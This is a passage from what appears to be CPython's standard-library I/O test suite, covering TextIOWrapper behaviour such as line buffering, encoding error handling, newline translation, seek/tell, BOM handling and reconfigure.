"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(support.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(support.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(support.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(support.TESTFN, "wb") as f: f.write(line*2) with self.open(support.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(support.TESTFN, "wb") as f: f.write(data) with self.open(support.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. # Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(support.TESTFN, 'wb') f.write(data) f.close() f = self.open(support.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(support.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(support.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(support.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. def test_read_by_chunk(self): # make sure "\r\n" straddles 128 char boundary. txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB")) reads = "" while True: c = txt.read(128) if not c: break reads += c self.assertEqual(reads, "A"*127+"\nB") def test_writelines(self): l = ['ab', 'cd', 'ef'] buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_userlist(self): l = UserList(['ab', 'cd', 'ef']) buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_error(self): txt = self.TextIOWrapper(self.BytesIO()) self.assertRaises(TypeError, txt.writelines, [1, 2, 3]) self.assertRaises(TypeError, txt.writelines, None) self.assertRaises(TypeError, txt.writelines, b'abc') def test_issue1395_1(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") # read one char at a time reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_2(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = "" while True: c = txt.read(4) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_3(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read(4) reads += txt.readline() reads += txt.readline() reads += txt.readline() self.assertEqual(reads, self.normalized) def test_issue1395_4(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read() self.assertEqual(reads, self.normalized) def test_issue1395_5(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) pos = txt.tell() txt.seek(0) txt.seek(pos) self.assertEqual(txt.read(4), "BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(support.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(support.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(support.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) threads = [threading.Thread(target=run, args=(x,)) for x in range(20)] with threading_helper.start_threads(threads, event.set): time.sleep(0.02) with self.open(support.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read) def test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('foo\n') txt.reconfigure(encoding='utf-8-sig') txt.write('\xe9\n') txt.flush() self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n') def test_reconfigure_write(self): # latin -> utf8 raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') txt.write('abc\xe9\n') txt.reconfigure(encoding='utf-8') self.assertEqual(raw.getvalue(), b'abc\xe9\n') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n') # ascii -> utf-8-sig: ensure that no BOM is written in the middle of # the file raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n') def test_reconfigure_write_non_seekable(self): raw = self.BytesIO() raw.seekable = lambda: False raw.seek = None txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() # If the raw stream is not seekable, there'll be a BOM self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n') def test_reconfigure_defaults(self): txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n') txt.reconfigure(encoding=None) self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.write('LF\n') txt.reconfigure(newline='\r\n') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.reconfigure(errors='ignore') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'ignore') txt.write('CRLF\n') txt.reconfigure(encoding='utf-8', newline=None) self.assertEqual(txt.errors, 'strict') txt.seek(0) self.assertEqual(txt.read(), 'LF\nCRLF\n') self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n') def test_reconfigure_newline(self): raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.read() t.tell() t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.write('x') t.tell() class MemviewBytesIO(io.BytesIO): '''A BytesIO object whose read method returns memoryviews rather than bytes''' def read1(self, len_): return _to_memoryview(super().read1(len_)) def read(self, len_): return 